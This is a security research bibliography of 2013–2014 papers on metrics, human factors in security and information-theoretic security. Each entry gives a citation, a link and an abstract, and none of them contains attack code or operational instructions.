  • Inuma, M.; Otsuka, A., "Relations Among Security Metrics For Template Protection Algorithms," Biometrics: Theory, Applications and Systems (BTAS), 2013 IEEE Sixth International Conference on , vol., no., pp.1,8, Sept. 29 2013-Oct. 2 2013. (ID#:14-1385) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6712714&isnumber=6712682 This paper gives the formal definitions for security metrics proposed by Simoens et al.[11] and Nagar et al.[1], and analyze the relations. [11] defined comprehensive metrics for all biometric template protection algorithms. Their security-related metrics are defined as the measurement of performance in various setting. Whereas [1] also defined similar but different performance-based metrics with a focus on the two-factor authentication scenario. One problem of performance-based metrics is its ambiguous relation with the security goals often discussed in the context of biometric cryptosystems[7]. The objective of this paper is to complement the previous work by Simoens et al.[11] in two points: (1) it gives formal definitions for metrics defined in [11] in order to make it applicable to biometric cryptosystems, and (2) it covers all security metrics for every variation in the two-factor authentication scenario, namely both or either of the key and/or the protected template is given to adversary. Keywords: biometrics (access control); cryptography; biometric cryptosystems; biometric template protection algorithm; performance-based metrics; security metrics; two-factor authentication scenario; Accuracy; Authentication; Databases; Feature extraction; Games; Measurement
  • Srivastava, S.; Kumar, R., "Indirect Method To Measure Software Quality Using CK-OO Suite," Intelligent Systems and Signal Processing (ISSP), 2013 International Conference on , vol., no., pp.47,51, 1-2 March 2013. (ID#:14-1386) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6526872&isnumber=6526858 In this paper, we consider experiential evidences in support of a set of object-oriented software metrics. In particular, we look at the object oriented design metrics of Chidamber and Kemerer, and their applicability in different application domains. Many of the early quality models have followed an approach, in which a set of factors that influence quality and relationships between different quality factors, are defined, with little scope of measurement. But the measurement plays an important role in every phase of software development process. The work, therefore, emphasizes on quantitative measurement of different quality attributes such as reusability, maintainability, testability, reliability and efficiency. With the widespread use of Object Oriented Technologies, CK metrics have proved to be very useful. So we have used CK metrics for measurement of these qualities attributes. The quality attributes are affected by values of CK metrics. We have derived linearly related equations from CK metrics to measure these quality attributes. Different concepts about software quality characteristics are reviewed and discussed in the Dissertation. We briefly describe the metrics, and present our empirical findings, arising from our analysis of systems taken from a number of different application domains. Our investigations have led us to conclude that a subset of the metrics can be of great value to software developers, maintainers and project managers. We have also taken an empirical study in Object Oriented language C++. Keywords: C++ language; object-oriented methods; program testing; software maintenance; software metrics; software quality; software reliability; software reusability; C++;CK metrics; CK-OO suite; maintainability; object oriented design metrics; object oriented language; object oriented technologies; object-oriented software metrics; reliability; reusability; software development process; software quality ;testability; S/W Quality; S/W measurement; matrices
  • Zhu, Qi; Deng, Peng; Di Natale, Marco; Zeng, Haibo, "Robust And Extensible Task Implementations Of Synchronous Finite State Machines," Design, Automation & Test in Europe Conference & Exhibition (DATE), 2013 , vol., no., pp.1319,1324, 18-22 March 2013. (ID#:14-1387) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6513718&isnumber=6513446 Model-based design using synchronous reactive (SR) models is widespread for the development of embedded control software. SR models ease verification and validation, and enable the automatic generation of implementations. In SR models, synchronous finite state machines (FSMs) are commonly used to capture changes of the system state under trigger events. The implementation of a synchronous FSM may be improved by using multiple software tasks instead of the traditional single-task solution. In this work, we propose methods to quantitatively analyze task implementations with respect to a breakdown factor that measures the timing robustness, and an action extensibility metric that measures the capability to accommodate upgrades. We propose an algorithm to generate a correct and efficient task implementation of synchronous FSMs for these two metrics, while guaranteeing the schedulability constraints.
  • Barrows, Clayton; Blumsack, Seth; Bent, Russell, "Using Network Metrics to Achieve Computationally Efficient Optimal Transmission Switching," System Sciences (HICSS), 2013 46th Hawaii International Conference on , vol., no., pp.2187,2196, 7-10 Jan. 2013. (ID#:14-1388) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6480106&isnumber=6479821 Recent studies have shown that dynamic removal of transmission lines from operation ("Transmission Switching") can reduce costs associated with power system operation. Smart Grid systems introduce flexibility into the transmission network topology and enable co-optimization of generation and network topology. The optimal transmission switching (OTS) problem has been posed in on small test systems, but problem complexity and large system sizes make OTS intractable. Our previous work suggests that most economic benefits of OTS arise through switching a small number of lines, so pre-screening has the potential to produce good solutions in less time. We explore the use of topological and electrical graph metrics to increase solution speed via solution space reduction. We find that screening based on line outage distribution factors outperforms other methods. When compared to un-screened OTS on the RTS-96 and IEEE 118-Bus networks, the sensitivity-based screen generates near optimal solutions in a fraction of the time. Keywords: Generators; Load flow; Network topology; Power system reliability; Power transmission lines; Security; Switches; Optimization; Power Systems; Smart Grid; Transmission Switching
  • Gul Calikli, Ayse Basar Bener. "Influence Of Confirmation Biases Of Developers On Software Quality: An Empirical Study" Journal of Software Quality Control. Volume 21 Issue 2, June 2013 (Pages 377-416). (ID#:14-1389) Available at: http://dl.acm.org/citation.cfm?id=2458014.2458019&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1007/s11219-012-9180-0 The thought processes of people have a significant impact on software quality, as software is designed, developed and tested by people. Cognitive biases, which are defined as patterned deviations of human thought from the laws of logic and mathematics, are a likely cause of software defects. However, there is little empirical evidence to date to substantiate this assertion. In this research, we focus on a specific cognitive bias, confirmation bias, which is defined as the tendency of people to seek evidence that verifies a hypothesis rather than seeking evidence to falsify a hypothesis. Due to this confirmation bias, developers tend to perform unit tests to make their program work rather than to break their code. Therefore, confirmation bias is believed to be one of the factors that lead to an increased software defect density. In this research, we present a metric scheme that explores the impact of developers' confirmation bias on software defect density. In order to estimate the effectiveness of our metric scheme in the quantification of confirmation bias within the context of software development, we performed an empirical study that addressed the prediction of the defective parts of software. In our empirical study, we used confirmation bias metrics on five datasets obtained from two companies. Our results provide empirical evidence that human thought processes and cognitive aspects deserve further investigation to improve decision making in software development for effective process management and resource allocation. Keywords: Confirmation bias, Defect prediction, Human factors, Software psychology, work metrics
  • Alistair Moffat, Paul Thomas, Falk Scholer "Users Versus Models: What Observation Tells Us About Effectiveness Metrics" CIKM '13: Proceedings of the 22nd ACM International Conference On Conference On Information & Knowledge Management October 2013. (ID#:14-1390) Available at: http://dl.acm.org/citation.cfm?id=2505515.2507665&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2505515.2507665 Retrieval system effectiveness can be measured in two quite different ways: by monitoring the behavior of users and gathering data about the ease and accuracy with which they accomplish certain specified information-seeking tasks; or by using numeric effectiveness metrics to score system runs in reference to a set of relevance judgments. In the second approach, the effectiveness metric is chosen in the belief that user task performance, if it were to be measured by the first approach, should be linked to the score provided by the metric. This work explores that link, by analyzing the assumptions and implications of a number of effectiveness metrics, and exploring how these relate to observable user behaviors. Data recorded as part of a user study included user self-assessment of search task difficulty; gaze position; and click activity. Our results show that user behavior is influenced by a blend of many factors, including the extent to which relevant documents are encountered, the stage of the search process, and task difficulty. These insights can be used to guide development of batch effectiveness metrics. Keywords: evaluation, retrieval experiment, system measurement
  • Nathaniel Husted, Steven Myers, Abhi Shelat, Paul Grubbs. "GPU And CPU Parallelization Of Honest-But-Curious Secure Two-Party Computation" ACSAC '13 Proceedings of the 29th Annual Computer Security Applications Conference December 2013 (Pages 169-178) . (ID#:14-1391) Available at: http://dl.acm.org/citation.cfm?id=2523649.2523681&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2523649.2523681 Recent work demonstrates the feasibility and practical use of secure two-party computation [5, 9, 15, 23]. In this work, we present the first Graphical Processing Unit (GPU)-optimized implementation of an optimized Yao's garbled-circuit protocol for two-party secure computation in the honest-but-curious and 1-bit-leaked malicious models. We implement nearly all of the modern protocol advancements, such as Free-XOR, Pipelining, and OT extension. Our implementation is the first allowing entire circuits to be generated concurrently, and makes use of a modification of the XOR technique so that circuit generation is optimized for implementation on SIMD architectures of GPUs. In our best cases we generate about 75 million gates per second and we exceed the state of the art performance metrics on modern CPU systems by a factor of about 200, and GPU systems by about a factor of 2.3. While many recent works on garbled circuits exploit the embarrassingly parallel nature of many tasks that are part of a secure computation protocol, we show that there are still various forms and levels of parallelization that may yet improve the performance of these protocols. In particular, we highlight that implementations on the SIMD architecture of modern GPUs require significantly different approaches than the general purpose MIMD architecture of multi-core CPUs, which again differ from the needs of parallelizing on compute clusters. Additionally, modifications to the security models for many common protocols have large effects on reasonable parallel architectures for implementation.
  • Jeremiah Blocki, Saranga Komanduri, Ariel Procaccia, Or Sheffet. "Optimizing Password Composition Policies" EC '13: Proceedings Of The Fourteenth ACM Conference On Electronic Commerce June 2013 (Pages 105-122). (ID#:14-1392) Available at: http://dl.acm.org/citation.cfm?id=2492002.2482552&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2482540.2482552 A password composition policy restricts the space of allowable passwords to eliminate weak passwords that are vulnerable to statistical guessing attacks. Usability studies have demonstrated that existing password composition policies can sometimes result in weaker password distributions; hence a more principled approach is needed. We introduce the first theoretical model for optimizing password composition policies. We study the computational and sample complexity of this problem under different assumptions on the structure of policies and on users' preferences over passwords. Our main positive result is an algorithm that -- with high probability --- constructs almost optimal policies (which are specified as a union of subsets of allowed passwords), and requires only a small number of samples of users' preferred passwords. We complement our theoretical results with simulations using a real-world dataset of 32 million passwords. Keywords: computational complexity, password composition policy, sampling, security
  • Georgios Kontaxis, Elias Athanasopoulos, Georgios Portokalidis, Angelos D. Keromytis "SAuth: Protecting User Accounts From Password Database Leaks" CCS '13: Proceedings of the 2013 ACM SIGSAC Conference On Computer & Communications Security November 2013 (Pages 187-198). (ID#:14-1393) Available at: http://dl.acm.org/citation.cfm?id=2508859.2516746&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2508859.2516746 Password-based authentication is the dominant form of access control in web services. Unfortunately, it proves to be more and more inadequate every year. Even if users choose long and complex passwords, vulnerabilities in the way they are managed by a service may leak them to an attacker. Recent incidents in popular services such as LinkedIn and Twitter demonstrate the impact that such an event could have. The use of one-way hash functions to mitigate the problem is countered by the evolution of hardware which enables powerful password-cracking platforms. In this paper we propose SAuth, a protocol which employs authentication synergy among different services. Users wishing to access their account on service S will also have to authenticate for their account on service V, which acts as a vouching party. Both services S and V are regular sites visited by the user everyday (e.g., Twitter, Facebook, Gmail). Should an attacker acquire the password for service S he will be unable to log in unless he also compromises the password for service V and possibly more vouching services. SAuth is an extension and not a replacement of existing authentication methods. It operates one layer above without ties to a specific method, thus enabling different services to employ heterogeneous systems. Finally we employ password decoys to protect users that share a password across services. Keywords: Security and privacy, Security services, Authentication, decoys, password leak, synergy
  • Majdi Abdellatief, Abu Bakar Md Sultan, Abdul Azim Abdul Ghani, Marzanah A. Jabar . "A Mapping Study To Investigate Component-Based Software System Metrics" Journal of Systems and Software , Volume 86 Issue 3 March 2013 (Pages 587-603) . (ID#:14-1394) Available at: http://dl.acm.org/citation.cfm?id=2430750.2430927&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1016/j.jss.2012.10.001 A component-based software system (CBSS) is a software system that is developed by integrating components that have been deployed independently. In the last few years, many researchers have proposed metrics to evaluate CBSS attributes. However, the practical use of these metrics can be difficult. For example, some of the metrics have concepts that either overlap or are not well defined, which could hinder their implementation. The aim of this study is to understand, classify and analyze existing research in component-based metrics, focusing on approaches and elements that are used to evaluate the quality of CBSS and its components from a component consumer's point of view. This paper presents a systematic mapping study of several metrics that were proposed to measure the quality of CBSS and its components. We found 17 proposals that could be applied to evaluate CBSSs, while 14 proposals could be applied to evaluate individual components in isolation. Various elements of the software components that were measured are reviewed and discussed. Only a few of the proposed metrics are soundly defined. The quality assessment of the primary studies detected many limitations and suggested guidelines for possibilities for improving and increasing the acceptance of metrics. However, it remains a challenge to characterize and evaluate a CBSS and its components quantitatively. For this reason, much effort must be made to achieve a better evaluation approach in the future. Keywords: Component-based software system, Software components, Software metrics, Software quality, Systematic mapping study


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Human Factors

Human Factors


Automated defenses are often the first line against cyber-attacks. But human factors play a major role both in terms of attack and defense. The fourteen papers cited here examine a number of issues correlated with human factors to expose vulnerabilities. The first four papers were presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina.

  • Lucas Layman, Sylvain David Diffo, Nico Zazworka. "Human Factors in Webserver Log File Analysis: A Controlled Experiment on Investigating Malicious Activity" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1395) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf While automated methods are the first line of defense for detecting attacks on webservers, a human agent is required to understand the attacker's intent and the attack process. The goal of this research is to understand the value of various log fields and the cognitive processes by which log information is grouped, searched, and correlated. Such knowledge will enable the development of human-focused log le investigation technologies. We performed controlled experiments with 65 subjects (IT professionals and novices) who investigated excerpts from six webserver log files. Quantitative and qualitative data were gathered to: 1) analyze subject accuracy in identifying malicious activity; 2) identify the most useful pieces of log file information; and 3)understand the techniques and strategies used by subjects to process the information. Statistically significant effects were observed in the accuracy of identifying attacks and time taken depending on the type of attack. Systematic differences were also observed in the log fields used by high-performing and low-performing groups. The findings include: 1) new insights into how specific log data fields are used to effectively assess potentially malicious activity; 2) obfuscating factors in log data from a human cognitive perspective; and 3) practical implications for tools to support log file investigations. Keywords: security, science of security, log files, human factors
  • Alain Forget , Saranga Komanduri , Alessandro Acquisti, Nicolas Christin , Lorrie Faith Cranor , Rahul Telang. "Building the Security Behavior Observatory: An Infrastructure for Long-term Monitoring of Client Machines" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1396) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf We present an architecture for the Security Behavior Observatory (SBO), a client-server infrastructure designed to collect a wide array of data on user and computer behavior from hundreds of participants over several years. The SBO infrastructure had to be carefully designed to fulfill several requirements. First, the SBO must scale with the desired length, breadth, and depth of data collection. Second, we must take extraordinary care to ensure the security of the collected data, which will inevitably include intimate participant behavioral data. Third, the SBO must serve our research interests, which will inevitably change as collected data is analyzed and interpreted. This short paper summarizes some of our design and implementation benefits and discusses a few hurdles and trade-offs to consider when designing such a data collection system.
  • Wei Yang, Xusheng Xiao, Rahul Pandita, William Enck Tao Xie. "Improving Mobile Application Security via Bridging User Expectations and Application Behaviors" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1397) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf To keep malware out of mobile application markets, various existing techniques analyze the security aspects of application behaviors and summarize patterns of these security aspects to determine what applications do. However, there is lack of incorporating user expectations, reflected via user perceptions in combination with user judgment, into the analysis to determine whether the application behaviors are expected by the users. This poster presents our recent work on bridging the semantic gap between user perceptions of the application behavior and the actual application behavior. Keywords: Mobile Application, Privacy Control, Information Flow Analysis, Natural Language Processing
  • Agnes Davis, Ashwin Shashidharan, Qian Liu, William Enck, Anne McLaughlin, Benjamin Watson. "Insecure Behaviors on Mobile Devices under Stress" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1398) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf One of the biggest challenges in mobile security is human behavior. The most secure password may be useless if it is sent as a text or in an email. The most secure network is only as secure as its most careless user. Thus, in the current project we sought to discover the conditions under which users of mobile devices were most likely to make security errors. This scaffolds a larger project where we will develop automatic ways of detecting such environments and eventually supporting users during these times to encourage safe mobile behaviors.
  • Bakdash, J.Z.; Pizzocaro, D.; Precee, A., "Human Factors in Intelligence, Surveillance, and Reconnaissance: Gaps for Soldiers and Technology Recommendations," Military Communications Conference, MILCOM 2013 - 2013 IEEE , vol., no., pp.1900,1905, 18-20 Nov. 2013. (ID#:14-1399) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6735902&isnumber=6735577 We investigate the gaps for Soldiers in information collection and resource management for Intelligence, Surveillance, and Reconnaissance (ISR). ISR comprises the intelligence functions supporting military operations, we concentrate on ISR for physical sensors (air and ground platforms). To identify gaps, we use approaches from Human Factors (interactions between humans and technical systems to optimize human and system performance) at the level of Soldier functions/activities in ISR. Key gaps (e.g., the loud auditory signatures of some air assets, unofficial ISR requests, and unintended battlefield effects) are identified. These gaps illustrate that ISR is not purely a technical problem. Instead, interactions between technical systems, humans, and the environment result in unpredictability and adaptability in using technical systems. To mitigate these gaps, we provide technology recommendations. Keywords: human factors; surveillance; ISR; battlefield effects; human factors; human-system integration; information collection; intelligence functions; intelligence surveillance reconnaissance; military operations; resource management; soldier functions; technical systems; Artificial intelligence; Human factors; Intelligent sensors; Interviews; Resource management; Security; SR; and reconnaissance; cognitive systems engineering; human factors; human-systems integration; intelligence; surveillance
  • Adeka, M.; Shepherd, S.; Abd-Alhameed, R., "Resolving the password security purgatory in the contexts of technology, security and human factors," Computer Applications Technology (ICCAT), 2013 International Conference on , vol., no., pp.1,7, 20-22 Jan. 2013. (ID#:14-1400) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6522044&isnumber=6521952 Passwords are the most popular and constitute the first line of defense in computer-based security systems; despite the existence of more attack-resistant authentication schemes. In order to enhance password security, it is imperative to strike a balance between having enough rules to maintain good security and not having too many rules that would compel users to take evasive actions which would, in turn, compromise security. It is noted that the human factor is the most critical element in the security system for at least three possible reasons; it is the weakest link, the only factor that exercises initiatives, as well as the factor that transcends all the other elements of the entire system. This illustrates the significance of social engineering in security designs, and the fact that security is indeed a function of both technology and human factors; bearing in mind the fact that there can be no technical hacking in vacuum. This paper examines the current divergence among security engineers as regards the rules governing best practices in the use of passwords: should they be written down or memorized; changed frequently or remain permanent? It also attempts to elucidate the facts surrounding some of the myths associated with computer security. This paper posits that destitution of requisite balance between the factors of technology and factors of humanity is responsible for the purgatory posture of password security related problems. It is thus recommended that, in the handling of password security issues, human factors should be given priority over technological factors. The paper proposes the use of the (k, n)- Threshold Scheme, such as the Shamir's secret-sharing scheme, to enhance the security of the password repository. This presupposes an inclination towards writing down the password: after all, Diamond, Platinum, Gold and Silver are not memorized; they are stored. Keywords: authorization; cryptography; social aspects of automation; Shamir secret-sharing scheme; attack-resistant authentication scheme; computer-based security system; human factors context; password repository; password security purgatory; security context; security design; security rule; social engineering; technology context; threshold scheme; computer security; cryptography; human hacking; password; password repository; purgatory; social engineering; socio-cryptanalysis; technology},
  • Rajbhandari, L., "Consideration of Opportunity and Human Factor: Required Paradigm Shift for Information Security Risk Management," Intelligence and Security Informatics Conference (EISIC), 2013 European , vol., no., pp.147,150, 12-14 Aug. 2013. . (ID#:14-1401) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657142&isnumber=6657109 Most of the existing Risk Analysis and Management Methods (RAMMs) focus on threat without taking account of the available opportunity to an entity. Besides, human aspects are not often given much importance in these methods. These issues create a considerable drawback as the available opportunities to an entity (organization, system, etc.) might go unnoticed which might hamper the entity from achieving its objectives. Moreover, understanding the motives of humans plays an important role in guiding the risk analysis. This paper reviews several existing RAMMs to highlight the above issues and provides reasoning as to emphasize the importance of these two issues in information security management. From the analysis of the selected methods, we identified that a majority of the methods acknowledge only threat and the consideration of human factors have not been reflected. Although, the issues are not new, these still remain open and the field of risk management needs to be directed towards addressing them. The review is expected to be helpful both to the researchers and practitioners in providing relevant information to consider these issues for further improving the existing RAMMs or when developing new methods. Keywords: business data processing; human factors; risk management; security of data; RAMM; human aspects; human factor; information security risk management; paradigm shift; risk analysis and management methods; Human factors; Information security; NIST; Risk management; human factors; opportunity; risk management
  • Chowdhury, S.; Poet, R.; Mackenzie, L., "Exploring the Guessability of Image Passwords Using Verbal Descriptions," Trust, Security and Privacy in Computing and Communications (TrustCom), 2013 12th IEEE International Conference on , vol., no., pp.768,775, 16-18 July 2013. . (ID#:14-1402) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6680913&isnumber=6680793 One claimed advantage of the image passwords used in recognition based graphical authentication systems (RBGSs) over text passwords is that they cannot be written down or verbally disclosed. However, there is no empirical evidence to support this claim. In this paper, we present the first published comparison of the vulnerability of four different image types -Mikon, doodle, art and everyday object images to verbal/spoken descriptions, when used as passwords in RBGS. This paper considers one of the human factors in security i.e. password sharing through spoken descriptions. The user study conducted with 126 participants (56 callers/ describer and 70 listeners/ attacker) measures how easy it is for an attacker to guess a password in a RBGS, if the passwords are verbally described. The experimental set up is a two way dialogue between a caller and a listener over telephone using repeated measures protocol, which measures mean successful login percentage. The results of the study show the object images to be most guessable, and doodles follow close behind. Mikon images are less guessable than doodle followed by art images, which are the least guessable. We believe that unless, the human factors in security like the one considered in this paper is taken into account, the RBGSs will always look secure on paper, but fail in practice. Keywords: human factors; image coding; security of data; Mikon image; RBGS; art image; doodle image; everyday object images; human factors; image password guessability; password sharing; recognition based graphical authentication systems; repeated measure protocol; spoken descriptions; text passwords; verbal descriptions; Art; Authentication; Educational institutions; Electronic mail; Image recognition; Protocols; graphical authentication; guessability study; human factors in security; image passwords; password disclosure; verbal descriptions
  • Phuong Cao, Hongyang Li, Klara Nahrstedt, Zbigniew Kalbarczyk, Ravishankar Iyer, Adam J. Slagell. "Personalized Password Guessing: a New Security Threat" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) . (ID#:14-1403) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf This paper presents a model for generating personalized passwords (i.e., passwords based on user and service profile). A user's password is generated from a list of personalized words, each word is drawn from a topic relating toa user and the service in use. The proposed model can be applied to: (i) assess the strength of a password (i.e., determine how many guesses are used to crack the password), and (ii) generate secure (i.e., contains digits, special characters, or capitalized characters) yet easy to memorize passwords. Keywords: guessing, password, personalized, suggestion
  • Sambit Bakshi, Tugkan Tuglular. "Security through human-factors and biometrics" Proceedings of the 6th International Conference on Security of Information and Networks November 2013 (Pages 463-463) . (ID#:14-1404) Available at:http://dl.acm.org/citation.cfm?id=2523514.2523597&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://doi.acm.org/10.1145/2523514.2523597 Biometrics is the science of identifying or verifying every individual uniquely in a set of people by using physiological or behavioral characteristics possessed by the user. Opposed to the knowledge-based and token-based security systems, cutting-edge biometrics-based identification systems offer higher security and less probability of spoofing. The need of biometric systems is increasing in day-to-day activities due to its ease of use by common people in any sector of personalized access, e.g. in attendance system of organizations, citizenship proof, door lock for high security zones, etc. Financial sector, government, and reservation systems are adopting biometric technologies to ensure highest possible security in their own domains and to maintain signed activity log of every individual. Keywords: human factors, human computer interaction
  • Lisa Rajbhandari. "Consideration of Opportunity and Human Factor: Required Paradigm Shift for Information Security Risk Management" EISIC '13 Proceedings of the 2013 European Intelligence and Security Informatics Conference August 2013 (Pages 147-150) . (ID#:14-1405) Available at: http://dl.acm.org/citation.cfm?id=2547608.2547651&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dx.doi.org/10.1109/EISIC.2013.32 Most of the existing Risk Analysis and Management Methods (RAMMs) focus on threat without taking account of the available opportunity to an entity. Besides, human aspects are not often given much importance in these methods. These issues create a considerable drawback as the available opportunities to an entity (organization, system, etc.) might go unnoticed which might hamper the entity from achieving its objectives. Moreover, understanding the motives of humans plays an important role in guiding the risk analysis. This paper reviews several existing RAMMs to highlight the above issues and provides reasoning as to emphasize the importance of these two issues in information security management. From the analysis of the selected methods, we identified that a majority of the methods acknowledge only threat and the consideration of human factors have not been reflected. Although, the issues are not new, these still remain open and the field of risk management needs to be directed towards addressing them. The review is expected to be helpful both to the researchers and practitioners in providing relevant information to consider these issues for further improving the existing RAMMs or when developing new methods.
  • Hannah Quay-de la Vallee, James M. Walsh, William Zimrin, Kathi Fisler, Shriram Krishnamurthi, "Usable security as a static-analysis problem: modeling and reasoning about user permissions in social-sharing systems" Proceedings of the 2013 ACM international symposium on New ideas, new paradigms, and reflections on programming & software October 2013 (Pages 1-16) . (ID#:14-1406) Available at: http://dl.acm.org/citation.cfm?id=2509578.2509589&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://doi.acm.org/10.1145/2509578.2509589 The privacy policies of many websites, especially those designed for sharing data, are a product of many inputs. They are defined by the program underlying the website, by user configurations (such as privacy settings), and by the interactions that interfaces enable with the site. A website's security thus depends partly on users' ability to effectively use security mechanisms provided through the interface. Questions about the effectiveness of an interface are typically left to manual evaluation by user-experience experts. However, interfaces are generated by programs and user input is received and processed by programs. This suggests that aspects of usable security could also be approached as a program-analysis problem. This paper establishes a foundation on which to build formal analyses for usable security. We define a formal model for data-sharing websites. We adapt a set of design principles for usable security to modern websites and formalize them with respect to our model. In the formalization, we decompose each principle into two parts: one amenable to formal analysis, and another that requires manual evaluation by a designer. We demonstrate the potential of this approach through a preliminary analysis of models of actual sites. Keywords: formal methods, human factors, protection mechanisms
  • Amir Herzberg, Ronen Margulies. "Forcing Johnny to login safely" Journal of Computer Security - Research in Computer Security and Privacy: Emerging Trends. Volume 21 Issue 3, May 2013 ( Pages 393-424) . (ID#:14-1407) Available at: http://dl.acm.org/citation.cfm?id=2590618.2590622&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dl.acm.org/citation.cfm?id=2590618.2590622 We present the results of the first long-term user study of site-based login mechanisms which force and train users to login safely. We found that interactive site-identifying images received 70% detection rates, which is significantly better than the results received by the typical login ceremony and with passive defense indicators [in: CHI'06: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, ACM, New York, 2006, pp. 601--610; Computers & Security 281,2 2009, 63--71; in: SP'07: Proceedings of the 2007 IEEE Symposium on Security and Privacy, IEEE Computer Society, Washington, 2007, pp. 51--65]. We also found that combining login bookmarks with interactive images and 'non-working' buttons/links achieved the best detection rates 82% and overall resistance rates 93%.We also present WAPP Web Application Phishing-Protection, an effective server-side solution which combines the login bookmark and the interactive custom image indicators. WAPP provides two-factor and two-sided authentication.
  • Song Chen, Vandana P. Janeja, "Human perspective to anomaly detection for cybersecurity" Journal of Intelligent Information Systems, Volume 42 Issue 1, February 2014 ( Pages 133-153) . (ID#:14-1408) Available at: http://dl.acm.org/citation.cfm?id=2583732.2583763&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dx.doi.org/10.1007/s10844-013-0266-3 Traditionally signature-based network Intrusion Detection Systems (IDS) rely on inputs from domain experts and can only identify the attacks if they occur as individual event. IDS generate large number of alerts and it becomes very difficult for human users to go through each message. Previous researches have proposed analytics based approaches to analyze IDS alert patterns based on anomaly detection models, multi-steps models or probabilistic approaches. However, due to the complexities of network intrusions, it is impossible to develop all possible attack patterns or to avoid false positives. With the advance in technologies and popularity of networks in our daily life, it is becoming more and more difficult to detect network intrusions. However, no matter how rapid the technologies change, the human behaviors behind the cyber attacks stay relatively constant. This provides us an opportunity to develop an improved system to detect the unusual cyber attacks. In this paper, we developed four network intrusion models based on consideration of human factors. We then tested these models on ITOC Cyber Defense Competition (CDX) 2009 data. Our results are encouraging. These Models are not only able to recognize most network attacks identified by SNORT log alerts, they are also able to distinguish the non-attack network traffic that was potentially missed by SNORT as indicated by ground truth validation of the data.

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Theoretic Security

Information Theoretic Security


A cryptosystem is said to be information-theoretically secure if its security derives purely from information theory and cannot be broken even when the adversary has unlimited computing power. For example, the one-time pad is an information-theoretically secure cryptosystem proven by Claude Shannon, inventor of information theory, to be secure. Information-theoretically secure cryptosystems are often used for the most sensitive communications such as diplomatic cables and high-level military communications, because of the great efforts enemy governments expend toward breaking them. Because of this importance, methods, theory and practice in information theory security also remains high. The works cited here address quantum computing, steganography, DNA based security, cyclic elliptic curves, algebraic coding theory and other approaches.

  • Thapa, D.; Harnesk, D., "Rethinking the Information Security Risk Practices: A Critical Social Theory Perspective," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.3207,3214, 6-9 Jan. 2014. (ID#:14-1684) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758999&isnumber=6758592 There is a lack of theoretical understanding of information security risk practices. For example, the information security risks related literatures are dominated by instrumental approach to protect the information assets. This approach, however, often fails to acknowledge the ideologies and consequences of risks practices. In this paper, through critical analysis, we suggest various perspectives to advance the understanding in this regard. In doing so, we present our argument by reviewing the security risk literature using Habermas's concept of four orientations: instrumental, strategic, communicative and discursive. The contribution of this paper is to develop conceptual clarity of the risk related ideologies and its consequences on emancipation. Keywords: asset management; risk management; security of data; Habermas concept; communicative orientation; critical analysis; critical social theory perspective; discursive orientation; information asset protection; information security risk practices; instrumental approach; instrumental orientation; risk practices; risk related ideologies; strategic orientation; Context; Information security; Instruments; Organizations; Risk management; Information security risk practices; critical social theory; emancipation B
